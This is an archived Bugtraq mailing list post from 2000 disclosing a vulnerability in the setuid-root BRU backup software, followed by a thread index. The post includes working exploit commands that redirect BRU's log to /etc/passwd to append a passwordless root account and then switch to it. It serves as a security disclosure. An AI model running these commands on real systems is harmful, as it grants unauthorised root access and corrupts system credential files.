Bugtraq mailing list archives
BRU Vulnerability
From: comsec.admin () GTE NET (root)
Date: Tue, 6 Jun 2000 14:22:24 -0700
We have found a vulnerability in BRU during our 'Security Contest' for our company. The details are included. -- Riley Hassell Network Security Speakeasy Networks 1-206-728-9770 ext151 1-206-917-5151 Direct Line BRU backup software Vulnerability: Description: You can change the log file BRU uses by changing the BRUEXECLOG environment variable. Since bru is setuid root you can append to any file on the system. Exploitation: $ BRUEXECLOG=/etc/passwd $ export BRUEXECLOG $ bru -V ' > comsec::0:0::/:/bin/sh > ' $ su comsec # Temporary fix: Why do normal users need to run bru. ;)
Current thread:
- BRU Vulnerability root (Jun 06)
- Re: BRU Vulnerability Gavrie Philipson (Jun 07)
- Re: BRU Vulnerability Jeremy Rauch (Jun 08)
- Re: BRU Vulnerability Theo Van Dinter (Jun 11)
- Re: BRU Vulnerability terry white (Jun 11)
- Exploit to the overflow in restore Ronald Huizer [Crew] (Jun 14)
- Remote DoS attack in Networks Associates PGP Certificate Server Version 2.5 Vulnerability Ussr Labs (Jun 14)
- BEA WebLogic JSP showcode vulnerability stuart.mcclure () FOUNDSTONE COM (Jun 11)
- Re: BRU Vulnerability Jeremy Rauch (Jun 08)
- Microsoft Security Bulletin (MS00-040) Microsoft Product Security (Jun 08)
- Mission statement for LKAP(Linux Kernel Auditing Project) Bryan Paxton (Jun 08)
- Re: BRU Vulnerability Gavrie Philipson (Jun 07)